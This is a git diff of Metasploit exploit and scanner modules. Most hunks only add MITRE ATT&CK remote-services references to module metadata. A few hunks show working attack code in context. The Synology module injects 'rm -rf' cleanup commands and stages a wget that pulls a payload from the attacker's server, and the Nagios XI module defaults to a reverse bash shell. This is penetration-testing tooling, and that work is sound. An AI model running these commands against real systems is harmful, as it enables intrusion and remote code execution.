diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb index 9a73089b15..8c9f556b8d 100644 --- a/modules/auxiliary/admin/smb/check_dir_file.rb +++ b/modules/auxiliary/admin/smb/check_dir_file.rb @@ -31,6 +31,7 @@ class MetasploitModule < Msf::Auxiliary 'j0hn__f' ], 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ] ], 'License' => MSF_LICENSE, 'Notes' => { diff --git a/modules/auxiliary/admin/smb/download_file.rb b/modules/auxiliary/admin/smb/download_file.rb index d7e7743d22..cdcfd87e81 100644 --- a/modules/auxiliary/admin/smb/download_file.rb +++ b/modules/auxiliary/admin/smb/download_file.rb @@ -29,7 +29,10 @@ class MetasploitModule < Msf::Auxiliary 'Stability' => [CRASH_SAFE], 'SideEffects' => [], 'Reliability' => [] - } + }, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ] + ] ) register_options([ diff --git a/modules/auxiliary/admin/smb/list_directory.rb b/modules/auxiliary/admin/smb/list_directory.rb index 374f0865c3..c883f9355a 100644 --- a/modules/auxiliary/admin/smb/list_directory.rb +++ b/modules/auxiliary/admin/smb/list_directory.rb @@ -27,6 +27,7 @@ class MetasploitModule < Msf::Auxiliary 'hdm' ], 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ] ], 'License' => MSF_LICENSE, 'Notes' => { diff --git a/modules/auxiliary/admin/smb/ms17_010_command.rb b/modules/auxiliary/admin/smb/ms17_010_command.rb index 38d598e61a..a0b2a38a6b 100644 --- a/modules/auxiliary/admin/smb/ms17_010_command.rb +++ b/modules/auxiliary/admin/smb/ms17_010_command.rb @@ -41,6 +41,7 @@ class MetasploitModule < Msf::Auxiliary [ 'URL', 'https://github.com/worawit/MS17-010' ], [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ], [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ], ], 'DisclosureDate' => '2017-03-14', 'Notes' => { diff --git a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb index 27ca1898fc..0d23da474b 100644 --- a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb +++ b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb @@ -29,7 +29,8 @@ class MetasploitModule < Msf::Auxiliary 'References' => [ ['CVE', '2010-0926'], ['OSVDB', '62145'], - ['URL', 'http://www.samba.org/samba/news/symlink_attack.html'] + ['URL', 'http://www.samba.org/samba/news/symlink_attack.html'], + ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES] ], 'License' => MSF_LICENSE, 'Notes' => { diff --git a/modules/auxiliary/admin/smb/upload_file.rb b/modules/auxiliary/admin/smb/upload_file.rb index 856c6d9345..908c91949d 100644 --- a/modules/auxiliary/admin/smb/upload_file.rb +++ b/modules/auxiliary/admin/smb/upload_file.rb @@ -26,6 +26,7 @@ class MetasploitModule < Msf::Auxiliary 'hdm' # metasploit module ], 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ] ], 'License' => MSF_LICENSE, 'Notes' => { diff --git a/modules/auxiliary/admin/smb/webexec_command.rb b/modules/auxiliary/admin/smb/webexec_command.rb index ce6f46611b..5e28c25e82 100644 --- a/modules/auxiliary/admin/smb/webexec_command.rb +++ b/modules/auxiliary/admin/smb/webexec_command.rb @@ -30,7 +30,8 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://webexec.org'], - ['CVE', '2018-15442'] + ['CVE', '2018-15442'], + ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES] ], 'Notes' => { 'Stability' => [CRASH_SAFE], diff --git a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb index a8a290d996..214a32700b 100644 --- a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb +++ b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb @@ -29,6 +29,7 @@ class MetasploitModule < Msf::Auxiliary ['OSVDB', '25479'], ['URL', 'https://web.archive.org/web/20080102163013/http://secunia.com/advisories/20107/'], ['CVE', '2006-2369'], + ['ATT&CK', Mitre::Attack::Technique::T1021_005_VNC], ], 'DisclosureDate' => '2006-05-15', 'Notes' => { diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index 3dd4715141..dee6e214ef 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -43,6 +43,7 @@ class MetasploitModule < Msf::Auxiliary ], 'References' => [ [ 'CVE', '1999-0506'], # Weak password + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ], ], 'License' => MSF_LICENSE, 'DefaultOptions' => { diff --git a/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb b/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb index 6c59f460a1..778263eafd 100644 --- a/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb @@ -33,7 +33,8 @@ class MetasploitModule < Msf::Auxiliary ['CVE', '2018-16158'], ['EDB', '45283'], ['URL', 'https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'], - ['URL', 'https://www.ctrlu.net/vuln/0006.html'] + ['URL', 'https://www.ctrlu.net/vuln/0006.html'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DisclosureDate' => '2018-07-18', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index 8ef9ec6e03..bc8232e9c2 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -29,7 +29,8 @@ class MetasploitModule < Msf::Auxiliary ['EDB', '39224'], ['PACKETSTORM', '135225'], ['URL', 'https://seclists.org/fulldisclosure/2016/Jan/26'], - ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios'] + ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DisclosureDate' => '2016-01-09', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb index f2d06e9e05..90c1e3c605 100644 --- a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb @@ -26,7 +26,8 @@ class MetasploitModule < Msf::Auxiliary 'References' => [ ['CVE', '2015-7755'], ['URL', 'https://www.rapid7.com/blog/post/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor/'], - ['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713'] + ['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DisclosureDate' => '2015-12-20', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb b/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb index c90f6c0f24..5e39df5079 100644 --- a/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb +++ b/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb @@ -36,7 +36,8 @@ class MetasploitModule < Msf::Auxiliary ], 'References' => [ ['CVE', '2018-10933'], - ['URL', 'https://www.libssh.org/security/advisories/CVE-2018-10933.txt'] + ['URL', 'https://www.libssh.org/security/advisories/CVE-2018-10933.txt'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DisclosureDate' => '2018-10-16', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb b/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb index a66ca27b0d..2acecea4b8 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb @@ -22,7 +22,10 @@ class MetasploitModule < Msf::Auxiliary 'Author' => ['Wyatt Dahlenburg (@wdahlenb)'], 'Platform' => ['linux'], 'SessionTypes' => ['shell', 'meterpreter'], - 'References' => [['URL', 'https://docs.github.com/en/authentication/connecting-to-github-with-ssh/testing-your-ssh-connection']], + 'References' => [ + ['URL', 'https://docs.github.com/en/authentication/connecting-to-github-with-ssh/testing-your-ssh-connection'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] + ], 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, diff --git a/modules/auxiliary/scanner/ssh/ssh_login.rb b/modules/auxiliary/scanner/ssh/ssh_login.rb index a1c411d256..1eac991d82 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login.rb @@ -28,7 +28,8 @@ class MetasploitModule < Msf::Auxiliary }, 'Author' => ['todb'], 'References' => [ - [ 'CVE', '1999-0502'] # Weak password + [ 'CVE', '1999-0502'], # Weak password + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] ], 'License' => MSF_LICENSE, 'DefaultOptions' => { 'VERBOSE' => false } # Disable annoying connect errors diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index 6953aa11f4..907b186446 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb @@ -35,7 +35,10 @@ class MetasploitModule < Msf::Auxiliary be shared between subject keys or only belong to a single one. }, 'Author' => ['todb', 'RageLtMan'], - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] + ] ) register_options( diff --git a/modules/auxiliary/scanner/telnet/telnet_login.rb b/modules/auxiliary/scanner/telnet/telnet_login.rb index a0a4c9bdf1..f758c71f18 100644 --- a/modules/auxiliary/scanner/telnet/telnet_login.rb +++ b/modules/auxiliary/scanner/telnet/telnet_login.rb @@ -26,7 +26,8 @@ class MetasploitModule < Msf::Auxiliary }, 'Author' => 'egypt', 'References' => [ - [ 'CVE', '1999-0502'] # Weak password + [ 'CVE', '1999-0502'], # Weak password + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb index 38ac706278..eecb689ea5 100644 --- a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb +++ b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb @@ -21,7 +21,8 @@ class MetasploitModule < Msf::Auxiliary 'References' => [ [ 'CVE', '2012-1803' ], [ 'EDB', '18779' ], - [ 'US-CERT-VU', '889195' ] + [ 'US-CERT-VU', '889195' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Author' => [ 'Borja Merino ', diff --git a/modules/auxiliary/scanner/vnc/ard_root_pw.rb b/modules/auxiliary/scanner/vnc/ard_root_pw.rb index 78d3adf7ba..d0ef3b604b 100644 --- a/modules/auxiliary/scanner/vnc/ard_root_pw.rb +++ b/modules/auxiliary/scanner/vnc/ard_root_pw.rb @@ -14,7 +14,8 @@ class MetasploitModule < Msf::Auxiliary 'Description' => 'Enable and set root account to a chosen password on unpatched macOS High Sierra hosts with either Screen Sharing or Remote Management enabled.', 'References' => [ ['CVE', '2017-13872'], - ['URL', 'https://support.apple.com/en-us/HT208315'] + ['URL', 'https://support.apple.com/en-us/HT208315'], + ['ATT&CK', Mitre::Attack::Technique::T1021_005_VNC] ], 'Author' => 'jgor', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/vnc/vnc_login.rb b/modules/auxiliary/scanner/vnc/vnc_login.rb index f69fa4fac0..8fdc830500 100644 --- a/modules/auxiliary/scanner/vnc/vnc_login.rb +++ b/modules/auxiliary/scanner/vnc/vnc_login.rb @@ -26,7 +26,8 @@ class MetasploitModule < Msf::Auxiliary 'jduck' ], 'References' => [ - [ 'CVE', '1999-0506'] # Weak password + [ 'CVE', '1999-0506'], # Weak password + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb index f5997805fe..6f2bb30591 100644 --- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb +++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb @@ -17,7 +17,10 @@ class MetasploitModule < Msf::Auxiliary This module runs arbitrary Windows commands using the WinRM Service }, 'Author' => [ 'thelightcosine' ], - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ] + ] ) register_options( diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index a39146c1f7..a6c85810e2 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -30,7 +30,8 @@ class MetasploitModule < Msf::Auxiliary }, 'Author' => [ 'thelightcosine', 'smashery' ], 'References' => [ - [ 'CVE', '1999-0502'] # Weak password + [ 'CVE', '1999-0502'], # Weak password + [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ] ], 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 2db73ca878..c020d1f3fd 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -19,7 +19,10 @@ class MetasploitModule < Msf::Auxiliary winrm option must be set. }, 'Author' => [ 'thelightcosine' ], - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ] + ] ) register_options( diff --git a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb index 3b80bacf63..fc17ef5b25 100644 --- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb +++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb @@ -26,7 +26,8 @@ class MetasploitModule < Msf::Exploit::Remote 'hdm' ], 'References' => [ - ['OSVDB', '61284'] + ['OSVDB', '61284'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' diff --git a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb index db93ccdad7..9ce0722456 100644 --- a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb +++ b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb @@ -42,7 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ ['CVE', '2023-45249'], ['URL', 'https://security-advisory.acronis.com/advisories/SEC-6452'], - ['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249'] + ['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], diff --git a/modules/exploits/linux/http/asuswrt_lan_rce.rb b/modules/exploits/linux/http/asuswrt_lan_rce.rb index 34f56c81f4..1342cb373b 100644 --- a/modules/exploits/linux/http/asuswrt_lan_rce.rb +++ b/modules/exploits/linux/http/asuswrt_lan_rce.rb @@ -33,7 +33,8 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'], ['URL', 'https://seclists.org/fulldisclosure/2018/Jan/78'], ['CVE', '2018-5999'], - ['CVE', '2018-6000'] + ['CVE', '2018-6000'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Targets' => [ [ diff --git a/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb b/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb index 85d67626f5..82c300184d 100644 --- a/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb +++ b/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb @@ -29,7 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote ['CVE', '2025-1094'], # The SQL injection in PostgreSQL code. ['URL', 'http://web.archive.org/web/20241226144006/https://www.beyondtrust.com/trust-center/security-advisories/bt24-10'], # BeyondTrust Advisory ['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # PostgreSQL Advisory - ['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'] # Rapid7 Analysis + ['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'], # Rapid7 Analysis + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2024-12-16', 'Platform' => [ 'linux', 'unix' ], diff --git a/modules/exploits/linux/http/f5_icontrol_exec.rb b/modules/exploits/linux/http/f5_icontrol_exec.rb index f132df4b1a..6dca771cce 100644 --- a/modules/exploits/linux/http/f5_icontrol_exec.rb +++ b/modules/exploits/linux/http/f5_icontrol_exec.rb @@ -24,7 +24,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ ['CVE', '2014-2928'], - ['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html'] + ['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, diff --git a/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb b/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb index cbb771403d..a0921d06cf 100644 --- a/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb +++ b/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb @@ -53,7 +53,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ ['CVE', '2019-15949'], - ['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'] # original PHP exploit + ['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'], # original PHP exploit + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Payload' => { 'BadChars' => "\x00" }, 'Targets' => [ @@ -77,7 +78,9 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }, 'Payload' => { + # rubocop:disable Lint/DetectMetadataTrailingLeadingWhitespace 'Append' => ' & disown', # the payload must be disowned after execution, otherwise cleanup fails + # rubocop:enable Lint/DetectMetadataTrailingLeadingWhitespace 'BadChars' => '"' } } diff --git a/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb b/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb index 27c429b14e..398540005b 100644 --- a/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb +++ b/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb @@ -29,7 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://github.com/Supervisor/supervisor/issues/964'], ['URL', 'https://www.debian.org/security/2017/dsa-3942'], ['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'], - ['CVE', '2017-11610'] + ['CVE', '2017-11610'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Platform' => 'linux', 'Targets' => [ diff --git a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb index 49c582ac02..49c434e805 100644 --- a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb +++ b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb @@ -39,7 +39,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'CVE', '2017-15889' ], [ 'EDB', '43190' ], [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-synology-storagemanager-smart-cgi-remote-command-execution/' ], - [ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ] + [ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Privileged' => true, 'Stance' => Msf::Exploit::Stance::Aggressive, @@ -179,20 +180,20 @@ class MetasploitModule < Msf::Exploit::Remote }) print_status('Cleaning env') - inject_request(cookie, token, cmd = 'rm -rf /a') - inject_request(cookie, token, cmd = 'rm -rf b') + inject_request(cookie, token, 'rm -rf /a') + inject_request(cookie, token, 'rm -rf b') command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//) command_space = 22 - "echo -n ''>>/a".length command_space -= 1 command.each_slice(command_space) do |a| a = a.join('') vprint_status("Staging wget with: echo -n '#{a}'>>/a") - inject_request(cookie, token, cmd = "echo -n '#{a}'>>/a") + inject_request(cookie, token, "echo -n '#{a}'>>/a") end print_status('Requesting payload pull') register_file_for_cleanup('/usr/syno/synoman/webman/modules/StorageManager/b') register_file_for_cleanup('/a') - inject_request(cookie, token, cmd = 'wget -i /a -O b') + inject_request(cookie, token, 'wget -i /a -O b') # at this point we let the HTTP server call the last stage # wfsdelay should be long enough to hold out for everything to download and run rescue ::Rex::ConnectionError diff --git a/modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb b/modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb index c7e476342f..c6067e58ee 100644 --- a/modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb +++ b/modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb @@ -36,7 +36,8 @@ class MetasploitModule < Msf::Exploit::Remote }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'References' => [ - [ 'CVE', '2013-2578'] + [ 'CVE', '2013-2578'], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Targets' => [ [ 'Automatic', {} ], diff --git a/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb b/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb index 5c813e6be1..61854e380a 100644 --- a/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb +++ b/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb @@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ ['CVE', '2025-24016'], ['URL', 'https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh'], - ['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016'] + ['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], diff --git a/modules/exploits/linux/misc/igel_command_injection.rb b/modules/exploits/linux/misc/igel_command_injection.rb index 2857a90861..666de0b0b2 100644 --- a/modules/exploits/linux/misc/igel_command_injection.rb +++ b/modules/exploits/linux/misc/igel_command_injection.rb @@ -35,7 +35,8 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2025-34082' ], [ 'URL', 'https://kb.igel.com/securitysafety/en/isn-2021-01-igel-os-remote-command-execution-vulnerability-41449239.html' ], - [ 'URL', 'https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt' ] + [ 'URL', 'https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ] ], 'Platform' => ['linux'], 'Arch' => [ARCH_X86, ARCH_X64], diff --git a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb index d909e5ec2c..78e45b09fd 100644 --- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb +++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb @@ -42,6 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ ['CVE', '2015-0936'], ['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH], ], 'DisclosureDate' => '2015-04-01', # Not a joke 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/ssh/exagrid_known_privkey.rb b/modules/exploits/linux/ssh/exagrid_known_privkey.rb index 9986346638..8a0b3b200d 100644 --- a/modules/exploits/linux/ssh/exagrid_known_privkey.rb +++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb @@ -40,7 +40,8 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2016-1560' ], # password [ 'CVE', '2016-1561' ], # private key - [ 'URL', 'https://www.rapid7.com/blog/post/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ] + [ 'URL', 'https://www.rapid7.com/blog/post/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] ], 'DisclosureDate' => '2016-04-07', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb index 64125268d4..4d9a508626 100644 --- a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb +++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb @@ -40,7 +40,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'URL', 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt' ], [ 'CVE', '2012-1493' ], [ 'OSVDB', '82780' ], - [ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ] + [ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] ], 'DisclosureDate' => '2012-06-11', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/ssh/ibm_drm_a3user.rb b/modules/exploits/linux/ssh/ibm_drm_a3user.rb index c6367baef5..30e1b7c404 100644 --- a/modules/exploits/linux/ssh/ibm_drm_a3user.rb +++ b/modules/exploits/linux/ssh/ibm_drm_a3user.rb @@ -28,7 +28,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'CVE', '2020-4429' ], # insecure default password [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md' ], [ 'URL', 'https://seclists.org/fulldisclosure/2020/Apr/33' ], - [ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/'] + [ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/'], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] ], 'Payload' => { 'Compat' => { diff --git a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb index 26060244ed..ac9083ba7b 100644 --- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb +++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb @@ -37,7 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => 'xistence ', # Discovery, Metasploit module 'License' => MSF_LICENSE, 'References' => [ - ['PACKETSTORM', '125754'] + ['PACKETSTORM', '125754'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DisclosureDate' => '2014-03-17', 'DefaultOptions' => { 